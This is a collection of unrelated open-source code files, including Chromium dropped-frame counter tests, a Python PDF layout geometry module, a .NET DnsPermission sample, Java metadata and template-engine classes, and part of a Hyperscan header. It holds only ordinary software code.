0u); } TEST_P(SmoothnessStrategyDroppedFrameCounterTest, Percentile95WithIdleFramesWhileHidden) { // The test scenario is the same as |Percentile95WithIdleFrames| test: // . 4s of 20% dropped frames. // . 96s of idle time. // However, the 96s of idle time happens *after* the page becomes invisible // (e.g. after a tab-switch). In this case, the idle time *should not* // contribute to the sliding window. // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; static_assert( kFps % 5 == 0, "kFps must be a multiple of 5 because this test depends on it."); SetInterval(kInterval); const auto* histogram = GetSlidingWindowHistogram(); // First 4 seconds with 20% dropped frames. SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 4); EXPECT_EQ(histogram->GetPercentDroppedFramePercentile(0.95), 20u); // Hide the page (thus resetting the pending frames), then idle for 96s before // producing a single frame. dropped_frame_counter_.ResetPendingFrames(GetNextFrameTime()); AdvancetimeByIntervals(kFps * 97); // A single frame to flush the pipeline. SimulateFrameSequence({false}, 1); EXPECT_EQ(histogram->GetPercentDroppedFramePercentile(0.95), 20u); } TEST_P(SmoothnessStrategyDroppedFrameCounterTest, Percentile95WithIdleFramesThenHide) { // The test scenario is the same as |Percentile95WithIdleFramesWhileHidden|: // . 4s of 20% dropped frames. // . 96s of idle time. // However, the 96s of idle time happens *before* the page becomes invisible // (e.g. after a tab-switch). In this case, the idle time *should* // contribute to the sliding window. // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; static_assert( kFps % 5 == 0, "kFps must be a multiple of 5 because this test depends on it."); SetInterval(kInterval); const auto* histogram = GetSlidingWindowHistogram(); // First 4 seconds with 20% dropped frames. SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 4); EXPECT_EQ(histogram->GetPercentDroppedFramePercentile(0.95), 20u); // Idle for 96s before hiding the page. AdvancetimeByIntervals(kFps * 97); dropped_frame_counter_.ResetPendingFrames(GetNextFrameTime()); AdvancetimeByIntervals(kFps * 97); // A single frame to flush the pipeline. SimulateFrameSequence({false}, 1); EXPECT_EQ(histogram->GetPercentDroppedFramePercentile(0.96), 0u); EXPECT_GT(histogram->GetPercentDroppedFramePercentile(0.97), 0u); } // Tests that when ResetPendingFrames updates the sliding window, that the max // PercentDroppedFrames is also updated accordingly. (https://crbug.com/1225307) TEST_P(SmoothnessStrategyDroppedFrameCounterTest, ResetPendingFramesUpdatesMaxPercentDroppedFrames) { // This tests a scenario where gaps in frame production lead to having // leftover frames in the sliding window for calculations of // ResetPendingFrames. // // Testing for when those frames are sufficient to change the current maximum // PercentDroppedFrames. // // This has been first seen in GpuCrash_InfoForDualHardwareGpus which forces // a GPU crash. Introducing long periods of idle while the Renderer waits for // a new GPU Process. (https://crbug.com/1164647) // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; SetInterval(kInterval); // One good frame SimulateFrameSequence({false}, 1); // Advance 1s so that when we process the first window, we go from having // enough frames in the interval, to no longer having enough. AdvancetimeByIntervals(kFps); // The first frame should fill up the sliding window. It isn't dropped, so // there should be 0 dropped frames. This will pop the first reported frame. // The second frame is dropped, however we are now tracking less frames than // the 1s window. So we won't use it in calculations yet. SimulateFrameSequence({false, true}, 1); EXPECT_EQ(dropped_frame_counter_.sliding_window_max_percent_dropped(), 0u); // Advance 1s so that we will attempt to update the window when resetting the // pending frames. The pending dropped frame above should be calculated here, // and the max percentile should be updated. AdvancetimeByIntervals(kFps); dropped_frame_counter_.ResetPendingFrames(GetNextFrameTime()); EXPECT_GT(dropped_frame_counter_.sliding_window_max_percent_dropped(), 0u); // There should be enough sliding windows reported with 0 dropped frames that // the 95th percentile stays at 0. EXPECT_EQ(PercentDroppedFrame95Percentile(), 0u); } TEST_F(DroppedFrameCounterTest, ResetPendingFramesAccountingForPendingFrames) { // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; SetInterval(kInterval); // First 2 seconds with 20% dropped frames. SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 2); // Have a pending frame which would hold the frames in queue. SimulatePendingFrame(1); // One second with 40% dropped frames. SimulateFrameSequence({false, false, false, true, true}, (kFps / 5)); // On the first 2 seconds are accounted for and pdf is 20%. EXPECT_EQ(MaxPercentDroppedFrame(), 20); dropped_frame_counter_.ResetPendingFrames(GetNextFrameTime()); // After resetting the pending frames, the pdf would be 40%. EXPECT_EQ(MaxPercentDroppedFrame(), 40); } TEST_F(DroppedFrameCounterTest, Reset) { // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; SetInterval(kInterval); // First 2 seconds with 20% dropped frames. SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 2); // Have a pending frame which would hold the frames in queue. SimulatePendingFrame(1); // Another 2 seconds with 40% dropped frames. SimulateFrameSequence({false, false, false, true, true}, (kFps / 5) * 2); EXPECT_EQ(MaxPercentDroppedFrame(), 20u); dropped_frame_counter_.Reset(); // Simulating gpu thread crash // After reset the max percent dropped frame would be 0 and frames in queue // behind the pending frame would not affect it. EXPECT_EQ(MaxPercentDroppedFrame(), 0u); } TEST_F(DroppedFrameCounterTest, ConsistentSmoothnessRatings) { // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; static_assert(kFps == 100, "kFps must be 100 because this test depends on it."); SetInterval(kInterval); // Add 5 seconds with 2% dropped frames. This should be in the first bucket. SimulateFrameSequence(MakeFrameSequence(1, 50), (kFps / 50) * 5); EXPECT_TRUE(CheckSmoothnessBuckets({100, 0, 0, 0, 0, 0, 0})); // Add 5 seconds with 5% dropped frames. This should be in the second bucket. dropped_frame_counter_.Reset(); dropped_frame_counter_.OnFcpReceived(); SimulateFrameSequence(MakeFrameSequence(1, 20), (kFps / 20) * 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 100, 0, 0, 0, 0, 0})); // Add 5 seconds with 10% dropped frames. This should be in the third bucket. dropped_frame_counter_.Reset(); dropped_frame_counter_.OnFcpReceived(); SimulateFrameSequence(MakeFrameSequence(1, 10), (kFps / 10) * 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 100, 0, 0, 0, 0})); // Add 5 seconds with 20% dropped frames. This should be in the fourth bucket. dropped_frame_counter_.Reset(); dropped_frame_counter_.OnFcpReceived(); SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 0, 100, 0, 0, 0})); // Add 5 seconds with 40% dropped frames. This should be in the fifth bucket. dropped_frame_counter_.Reset(); dropped_frame_counter_.OnFcpReceived(); SimulateFrameSequence({false, false, false, true, true}, (kFps / 5) * 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 0, 0, 100, 0, 0})); // Add 5 seconds with 60% dropped frames. This should be in the sixth bucket. dropped_frame_counter_.Reset(); dropped_frame_counter_.OnFcpReceived(); SimulateFrameSequence({false, false, true, true, true}, (kFps / 5) * 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 0, 0, 0, 100, 0})); // Add 5 seconds with 80% dropped frames. This should be in the last bucket. dropped_frame_counter_.Reset(); dropped_frame_counter_.OnFcpReceived(); SimulateFrameSequence({false, true, true, true, true}, (kFps / 5) * 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 0, 0, 0, 0, 100})); } TEST_F(DroppedFrameCounterTest, MovingSmoothnessRatings) { // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; static_assert(kFps == 100, "kFps must be 100 because this test depends on it."); SetInterval(kInterval); // Add a second with 40% dropped frames. Nothing should be added to the // histogram yet. SimulateFrameSequence({false, false, false, true, true}, kFps / 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 0, 0, 0, 0, 0})); // Add a second with 80% dropped frames. All very bad buckets should have some // entries. SimulateFrameSequence({false, true, true, true, true}, kFps / 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 0, 0, 22, 64, 14})); // Add a second with 10% dropped frames. Should be mostly very bad, with a few // bad and okay windows. SimulateFrameSequence(MakeFrameSequence(1, 10), kFps / 10); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 1, 9, 29, 50, 11})); // Add a second with 5% dropped frames, and a second with no dropped frames. // The sliding window should shift from ok to very good over time. SimulateFrameSequence(MakeFrameSequence(1, 20), kFps / 20); SimulateFrameSequence({false}, kFps); EXPECT_TRUE(CheckSmoothnessBuckets({15, 12.5, 23, 4.5, 14.5, 25, 5.5})); // Clear the counter, then add a second with 100% dropped frames and a second // with 0% dropped frames. As the sliding window shifts each integer percent // (other than 100%) should be reported once, exactly matching the size of // each bucket. dropped_frame_counter_.Reset(); dropped_frame_counter_.OnFcpReceived(); SimulateFrameSequence({true}, kFps); SimulateFrameSequence({false}, kFps); EXPECT_TRUE(CheckSmoothnessBuckets({3, 3, 6, 13, 25, 25, 25})); } TEST_F(DroppedFrameCounterTest, FramesInFlightWhenFcpReceived) { // Start five frames in flight. std::vector<viz::BeginFrameArgs> pending_frames = SimulatePendingFrame(5); // Set that FCP was received after the third frame starts, but before it ends. base::TimeTicks time_fcp_sent = pending_frames[2].frame_time + pending_frames[2].interval / 2; dropped_frame_counter_.SetTimeFcpReceivedForTesting(time_fcp_sent); // End each of the frames as dropped. The first three should not count for // smoothness, only the last two. for (const auto& frame : pending_frames) { dropped_frame_counter_.OnEndFrame(frame, CreateStubFrameInfo(true)); } EXPECT_EQ(dropped_frame_counter_.total_smoothness_dropped(), 2u); } TEST_F(DroppedFrameCounterTest, ForkedCompositorFrameReporter) { // Run different combinations of main and impl threads dropping, make sure // only one frame is counted as dropped each time. SimulateForkedFrame(false, false); EXPECT_EQ(dropped_frame_counter_.total_smoothness_dropped(), 0u); SimulateForkedFrame(true, false); EXPECT_EQ(dropped_frame_counter_.total_smoothness_dropped(), 1u); SimulateForkedFrame(false, true); EXPECT_EQ(dropped_frame_counter_.total_smoothness_dropped(), 2u); SimulateForkedFrame(true, true); EXPECT_EQ(dropped_frame_counter_.total_smoothness_dropped(), 3u); } TEST_F(DroppedFrameCounterTest, WorstSmoothnessTiming) { // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; static_assert( kFps % 5 == 0, "kFps must be a multiple of 5 because this test depends on it."); SetInterval(kInterval); // Prepare a second of pending frames, and send FCP after the last of these // frames. dropped_frame_counter_.Reset(); std::vector<viz::BeginFrameArgs> pending_frames = SimulatePendingFrame(kFps); const auto& last_frame = pending_frames.back(); base::TimeTicks time_fcp_sent = last_frame.frame_time + last_frame.interval / 2; dropped_frame_counter_.OnFcpReceived(); dropped_frame_counter_.SetTimeFcpReceivedForTesting(time_fcp_sent); // End each of the pending frames as dropped. These shouldn't affect any of // the metrics. for (const auto& frame : pending_frames) { dropped_frame_counter_.OnEndFrame(frame, CreateStubFrameInfo(true)); } // After FCP time, add a second each of 80% and 60%, and three seconds of 40% // dropped frames. This should be five seconds total. SimulateFrameSequence({false, true, true, true, true}, kFps / 5); SimulateFrameSequence({false, false, true, true, true}, kFps / 5); SimulateFrameSequence({false, false, false, true, true}, (kFps / 5) * 3); // Next two seconds are 20% dropped frames. SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 2); // The first 1, 2, and 5 seconds shouldn't be recorded in the corresponding // max dropped after N seconds metrics. EXPECT_FLOAT_EQ(MaxPercentDroppedFrame(), 80); EXPECT_FLOAT_EQ(MaxPercentDroppedFrameAfter1Sec(), 60); EXPECT_FLOAT_EQ(MaxPercentDroppedFrameAfter2Sec(), 40); EXPECT_FLOAT_EQ(MaxPercentDroppedFrameAfter5Sec(), 20); // Next second is 100% dropped frames, all metrics should include this. SimulateFrameSequence({true}, kFps); EXPECT_FLOAT_EQ(MaxPercentDroppedFrame(), 100); EXPECT_FLOAT_EQ(MaxPercentDroppedFrameAfter1Sec(), 100); EXPECT_FLOAT_EQ(MaxPercentDroppedFrameAfter2Sec(), 100); EXPECT_FLOAT_EQ(MaxPercentDroppedFrameAfter5Sec(), 100); } #if BUILDFLAG(IS_CHROMEOS_ASH) TEST_F(DroppedFrameCounterTest, ReportForUI) { constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; static_assert( kFps % 5 == 0, "kFps must be a multiple of 5 because this test depends on it."); SetInterval(kInterval); dropped_frame_counter_.EnableReporForUI(); base::HistogramTester histogram_tester; // 4 seconds with 20% dropped frames. SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 4); // Exact 1 sample of changing to 20% dropped frame percentage. histogram_tester.ExpectUniqueSample( "Ash.Smoothness.MaxPercentDroppedFrames_1sWindow", 20, 1); // More than 1 samples of 20% dropped frame percentage. EXPECT_GE(histogram_tester.GetBucketCount( "Ash.Smoothness.MaxPercentDroppedFrames_1sWindow.Uniform", 20), 1); } #endif // BUILDFLAG(IS_CHROMEOS_ASH) } // namespace } // namespace cc
12,448
329
""" Created on Oct 21, 2015 @author: xiao """ from collections import namedtuple import numpy as np # bbox indices x0 = 0 y0 = 1 x1 = 2 y1 = 3 class Segment(namedtuple("Segment", ["e", "vector"])): __slots__ = () @property def length(self): return self.vector[x0] if self.vector[x0] else self.vector[y0] def horizontal(self): return bool(self.vector[x0]) def vertical(self): return bool(self.vector[y0]) def __str__(self, *args, **kwargs): return " ".join(str(x) for x in [self.e, self.vector, self.e.linewidth]) def vectorize(e, tolerance=0.1): """ vectorizes the pdf object's bounding box min_width is the width under which we consider it a line instead of a big rectangle """ tolerance = max(tolerance, e.linewidth) is_high = e.height > tolerance is_wide = e.width > tolerance # if skewed towards a line if is_wide and not is_high: return (e.width, 0.0) if is_high and not is_wide: return (0.0, e.height) def aligned(e1, e2): """ alignment is determined by two boxes having one exactly the same attribute, which could mean parallel, perpendicularly forming a corner etc. """ return ( any(close(c1, c2) for c1, c2 in zip(e1.bbox, e2.bbox)) or x_center_aligned(e1, e2) or y_center_aligned(e1, e2) ) def x_center_aligned(e1, e2): return close(e1.x0 + e1.x1, e2.x0 + e2.x1) def x_aligned(a, b): return x_center_aligned(a, b) or close(a.x0, b.x0) or close(a.x1, b.x1) def y_center_aligned(e1, e2): return close(e1.y0 + e1.y1, e2.y0 + e2.y1) def close(f1, f2, thres=2.0): return abs(f1 - f2) < thres def origin(bbox): return bbox[:2] def center(bbox): return ((bbox[x0] + bbox[x1]) / 2, (bbox[y0] + bbox[y1]) / 2) def area(bbox): return (bbox[x1] - bbox[x0]) * (bbox[y1] - bbox[y0]) def l1(c1, c2): return sum(abs(v1 - v2) for v1, v2 in zip(c1, c2)) def segment_diff(s1, s2): """ Returns the sum of absolute difference between two segments' end points. Only perfectly aligned segments return 0 """ return abs(s1[0] - s2[0]) + abs(s1[1] - s2[1]) def bound_bboxes(bboxes): """ Finds the minimal bbox that contains all given bboxes """ group_x0 = min(map(lambda l: l[x0], bboxes)) group_y0 = min(map(lambda l: l[y0], bboxes)) group_x1 = max(map(lambda l: l[x1], bboxes)) group_y1 = max(map(lambda l: l[y1], bboxes)) return (group_x0, group_y0, group_x1, group_y1) def bound_elems(elems): """ Finds the minimal bbox that contains all given elems """ group_x0 = min(map(lambda l: l.x0, elems)) group_y0 = min(map(lambda l: l.y0, elems)) group_x1 = max(map(lambda l: l.x1, elems)) group_y1 = max(map(lambda l: l.y1, elems)) return (group_x0, group_y0, group_x1, group_y1) def intersect(a, b): """ Check if two rectangles intersect """ if a[x0] == a[x1] or a[y0] == a[y1]: return False if b[x0] == b[x1] or b[y0] == b[y1]: return False return a[x0] <= b[x1] and b[x0] <= a[x1] and a[y0] <= b[y1] and b[y0] <= a[y1] def inside(outer, inner): return ( inner[x0] >= outer[x0] and inner[x1] <= outer[x1] and inner[y0] >= outer[y0] and inner[y0] <= outer[y1] ) _stretch_dir = np.array([-1, -1, 1, 1]) def enlarge(bbox, delta): return np.array(bbox) + delta * _stretch_dir def reading_order(e1, e2): """ A comparator to sort bboxes from top to bottom, left to right """ b1 = e1.bbox b2 = e2.bbox if round(b1[y0]) == round(b2[y0]) or round(b1[y1]) == round(b2[y1]): return float_cmp(b1[x0], b2[x0]) return float_cmp(b1[y0], b2[y0]) def xy_reading_order(e1, e2): """ A comparator to sort bboxes from left to right, top to bottom """ b1 = e1.bbox b2 = e2.bbox if round(b1[x0]) == round(b2[x0]): return float_cmp(b1[y0], b2[y0]) return float_cmp(b1[x0], b2[x0]) def column_order(b1, b2): """ A comparator that sorts bboxes first by "columns", where a column is made up of all bboxes that overlap, then by vertical position in each column. b1 = [b1.type, b1.top, b1.left, b1.bottom, b1.right] b2 = [b2.type, b2.top, b2.left, b2.bottom, b2.right] """ (top, left, bottom) = (1, 2, 3) # TODO(senwu): Reimplement the functionality of this comparator to # detect the number of columns, and sort those in reading order. # TODO: This is just a simple top to bottom, left to right comparator # for now. if round(b1[top]) == round(b2[top]) or round(b1[bottom]) == round(b2[bottom]): return float_cmp(b1[left], b2[left]) return float_cmp(b1[top], b2[top]) # if((b1[left] >= b2[left] and b1[left] <= b2[right]) or # (b2[left] >= b1[left] and b2[left] <= b1[right])): # return float_cmp(b1[top], b2[top]) # # # Return leftmost columns first # return float_cmp(b1[left], b2[left]) def float_cmp(f1, f2): if f1 > f2: return 1 elif f1 < f2: return -1 else: return 0 def merge_intervals(elems, overlap_thres=2.0): """ Project in x axis Sort by start Go through segments and keep max x1 Return a list of non-overlapping intervals """ overlap_thres = max(0.0, overlap_thres) ordered = sorted(elems, key=lambda e: e.x0) intervals = [] cur = [-overlap_thres, -overlap_thres] for e in ordered: if e.x0 - cur[1] > overlap_thres: # Check interval validity if cur[1] > 0.0: intervals.append(cur) cur = [e.x0, e.x1] continue cur[1] = max(cur[1], e.x1) intervals.append(cur) # Freeze the interval to tuples return map(tuple, intervals)
2,739
421
<filename>samples/snippets/cpp/VS_Snippets_Remoting/DnsPermission_Constructor/CPP/dnspermission_constructor.cpp /* This program demonstrates the 'Constructor' of 'DnsPermission' class. It creates an instance of 'DnsPermission' class and checks for permission.Then it creates a 'SecurityElement' Object* and prints it's attributes which hold the XML encoding of 'DnsPermission' instance . */ #using <System.dll> using namespace System; using namespace System::Net; using namespace System::Security; using namespace System::Security::Permissions; using namespace System::Collections; public ref class DnsPermissionExample { // <Snippet1> public: void useDns() { // Create a DnsPermission instance. DnsPermission^ permission = gcnew DnsPermission( PermissionState::Unrestricted ); // Check for permission. permission->Demand(); // Create a SecurityElement Object* to hold XML encoding of the DnsPermission instance. SecurityElement^ securityElementObj = permission->ToXml(); Console::WriteLine( "Tag, Attributes and Values of 'DnsPermission' instance :" ); Console::WriteLine( "\n\tTag : {0}", securityElementObj->Tag ); // Print the attributes and values. PrintKeysAndValues( securityElementObj->Attributes ); } private: void PrintKeysAndValues( Hashtable^ myList ) { // Get the enumerator that can iterate through the hash table. IDictionaryEnumerator^ myEnumerator = myList->GetEnumerator(); Console::WriteLine( "\n\t-KEY-\t-VALUE-" ); while ( myEnumerator->MoveNext() ) { Console::WriteLine( "\t {0}:\t {1}", myEnumerator->Key, myEnumerator->Value ); } Console::WriteLine(); } // </Snippet1> }; int main() { try { DnsPermissionExample^ dnsPermissionExampleObj = gcnew DnsPermissionExample; dnsPermissionExampleObj->useDns(); } catch ( SecurityException^ e ) { Console::WriteLine( "SecurityException caught!!!" ); Console::WriteLine( "Source : {0}", e->Source ); Console::WriteLine( "Message : {0}", e->Message ); } catch ( Exception^ e ) { Console::WriteLine( "Exception caught!!!" ); Console::WriteLine( "Source : {0}", e->Source ); Console::WriteLine( "Message : {0}", e->Message ); } }
889
918
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.gobblin.metadata; import java.util.Collections; import java.util.Iterator; import java.util.LinkedHashSet; import java.util.Set; import com.google.common.base.Preconditions; import org.apache.gobblin.metadata.types.GlobalMetadata; /** * This class collects metadata records, optionally merging them with a set of default metadata. It also * keeps track of all of the merged records so they can be published at a later date. */ public class GlobalMetadataCollector { public static final int UNLIMITED_SIZE = -1; private final LinkedHashSet<GlobalMetadata> metadataRecords; private final GlobalMetadata defaultMetadata; private final int cacheSize; private String lastSeenMetadataId; /** * Initialize a MetdataCollector with the given cache size. * @param cacheSize You can pass the value -1 to have an unlimited cache size. */ public GlobalMetadataCollector(int cacheSize) { this(null, cacheSize); } /** * Initialize a MetadataCollector with some default metadata to merge incoming records with. * (Eg: a dataset-URN or a set of Transfer-Encodings). */ public GlobalMetadataCollector(GlobalMetadata defaultMetadata, int cacheSize) { Preconditions.checkArgument(cacheSize == -1 || cacheSize > 0, "cacheSize must be -1 or greater than 0"); this.defaultMetadata = defaultMetadata; this.cacheSize = cacheSize; this.lastSeenMetadataId = ""; this.metadataRecords = new LinkedHashSet<>(); } /** * Process a metadata record, merging it with default metadata. * <p> * If the combined (metadata + defaultMetadata) record is not present in the Collector's cache, * then the new metadata record will be stored in cache and returned. The oldest record in the cache will be evicted * if necessary. * <p>> * If the new record already exists in the cache, then the LRU time will be updated but this method will return null. */ public synchronized GlobalMetadata processMetadata(GlobalMetadata metadata) { GlobalMetadata recordToAdd = getRecordToAdd(metadata); if (recordToAdd != null) { boolean isNew = addRecordAndEvictIfNecessary(recordToAdd); return isNew ? recordToAdd : null; } return null; } /** * Return a Set of all merged metadata records in the cache. The set is immutable. */ public Set<GlobalMetadata> getMetadataRecords() { return Collections.unmodifiableSet(metadataRecords); } private boolean addRecordAndEvictIfNecessary(GlobalMetadata recordToAdd) { // First remove the element from the HashSet if it's already in there to reset // the 'LRU' piece; then add it back in boolean isNew = !metadataRecords.remove(recordToAdd); metadataRecords.add(recordToAdd); // Now remove the first element (which should be the oldest) from the list // if we've exceeded the cache size if (cacheSize != -1 && metadataRecords.size() > cacheSize) { Iterator<GlobalMetadata> recordIt = metadataRecords.iterator(); recordIt.next(); // Remove the oldest element - don't care what it is recordIt.remove(); } return isNew; } private GlobalMetadata getRecordToAdd(GlobalMetadata metadata) { if (metadata == null) { return defaultMetadata; } // Optimization - we know this record already has been seen, so don't // merge with defaults if (metadata.getId().equals(lastSeenMetadataId)) { return null; } lastSeenMetadataId = metadata.getId(); if (defaultMetadata != null) { metadata.mergeWithDefaults(defaultMetadata); } return metadata; } }
1,316
988
/** * Copyright (C) 2011-2015 The XDocReport Team <<EMAIL>> * * All rights reserved. * * Permission is hereby granted, free of charge, to any person obtaining * a copy of this software and associated documentation files (the * "Software"), to deal in the Software without restriction, including * without limitation the rights to use, copy, modify, merge, publish, * distribute, sublicense, and/or sell copies of the Software, and to * permit persons to whom the Software is furnished to do so, subject to * the following conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE * LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION * OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ package fr.opensagres.xdocreport.template; import java.io.IOException; import java.io.Reader; import java.io.Writer; import java.util.Map; import fr.opensagres.xdocreport.core.XDocReportException; import fr.opensagres.xdocreport.core.io.IEntryReaderProvider; import fr.opensagres.xdocreport.core.io.IEntryWriterProvider; import fr.opensagres.xdocreport.template.cache.ITemplateCacheInfoProvider; import fr.opensagres.xdocreport.template.config.ITemplateEngineConfiguration; import fr.opensagres.xdocreport.template.formatter.IDocumentFormatter; /** * Template engine used to merge Java model with some entries (XML file) from an XML document archive. */ public interface ITemplateEngine { /** * Returns the template engien kind (Freemarker, Velocity..) * * @return */ String getKind(); void setTemplateCacheInfoProvider( ITemplateCacheInfoProvider templateCacheInfoProvider ); ITemplateCacheInfoProvider getTemplateCacheInfoProvider(); void setConfiguration( ITemplateEngineConfiguration configuration ); ITemplateEngineConfiguration getConfiguration(); /** * Return the identifier of the template engine. * * @return */ String getId(); /** * Create a new context to register Java model. * * @return */ IContext createContext(); /** * Create a new context to register Java model from the given Map. * * @param contextMap * @return */ IContext createContext( Map<String, Object> contextMap ); /** * Merge Java model coming from the given context with the XML file entryName of the given document archive and * modify the entry of the document archive. * * @param reportId {@link IXDocReport#getId()}. * @param entryName entry name of the XML file from the document archive which must be merged. This XML file is the * template. * @param readerProvider entry reader provider. * @param context Java model context * @throws XDocReportException * @throws IOException */ void process( String reportId, String entryName, IEntryReaderProvider readerProvider, IEntryWriterProvider writerProvider, IContext context ) throws XDocReportException, IOException; void process( String reportId, String entryName, IEntryReaderProvider readerProvider, Writer writer, IContext context ) throws XDocReportException, IOException; /** * Merge Java model coming from the given context with the given reader and register the merge result in the given * writer. * * @param entryName template name * @param context Java model context * @param reader template reader to merge * @param writer merge result writer * @throws XDocReportException * @throws IOException */ void process( String entryName, IContext context, Reader reader, Writer writer ) throws XDocReportException, IOException; void extractFields( Reader reader, String entryName, FieldsExtractor extractor ) throws XDocReportException; void extractFields( IEntryReaderProvider readerProvider, String entryName, FieldsExtractor extractor ) throws XDocReportException; IDocumentFormatter getDocumentFormatter(); /** * Merge Java model coming from the given context with the given template name and register the merge result in the * given writer. * * @param templateName template name * @param context Java model context * @param reader template reader to merge * @param writer merge result writer * @param closeWriter true if writer must be closed and false otherwise. * @throws IOException * @throws XDocReportException */ void process( String templateName, IContext context, Writer writer ) throws IOException, XDocReportException; boolean isFieldNameStartsWithUpperCase(); }
1,627
640
<reponame>ghsecuritylab/tomato_egg<filename>release/src/router/samba3/source/tests/trivial.c<gh_stars>100-1000 main() { exit(0); }
58
2,868
/* * Copyright (c) 2017, Intel Corporation * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * * Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * Neither the name of Intel Corporation nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. */ /** \file * \brief exclusive analysis for infix and suffix engines. * Two engines are considered as exclusive if they can never be alive * at the same time. This analysis takes advantage of the property of * triggering literal + engine graph. If the triggering literals of * two engines can make all the states dead in each other's graph, * then they are exclusive. */ #ifndef ROSE_BUILD_EXCLUSIVE_H #define ROSE_BUILD_EXCLUSIVE_H #include "ue2common.h" #include "rose_build_impl.h" #include "util/alloc.h" #include "util/charreach.h" #include <map> #include <set> #include <vector> namespace ue2 { /** \brief role info structure for exclusive analysis */ template<typename role_id> struct RoleInfo { RoleInfo(role_id role_in, u32 id_in) : role(role_in), id(id_in) {} bool operator==(const RoleInfo &b) const { return id == b.id; } bool operator!=(const RoleInfo &b) const { return !(*this == b); } bool operator<(const RoleInfo &b) const { const RoleInfo &a = *this; if (a.score != b.score) { return a.score > b.score; } ORDER_CHECK(id); return false; } std::vector<std::vector<CharReach>> literals; // prefix literals CharReach prefix_cr; // reach of prefix literals CharReach last_cr; // reach of the last character of literals CharReach cr; // reach of engine graph const role_id role; // infix or suffix info const u32 id; // infix or suffix id u32 score = ~0U; // score for exclusive analysis }; /** * \brief add triggering literals to infix info. */ bool setTriggerLiteralsInfix(RoleInfo<left_id> &roleInfo, const std::map<u32, std::vector<std::vector<CharReach>>> &triggers); /** * \brief add triggering literals to suffix info. */ bool setTriggerLiteralsSuffix(RoleInfo<suffix_id> &roleInfo, const std::map<u32, std::vector<std::vector<CharReach>>> &triggers); /** * Exclusive analysis for infix engines. * * @param build rose build info mainly used to set exclusive chunk size here * @param vertex_map mapping between engine id and rose vertices * related to this engine * @param roleInfoSet structure contains role properties including infix info, * 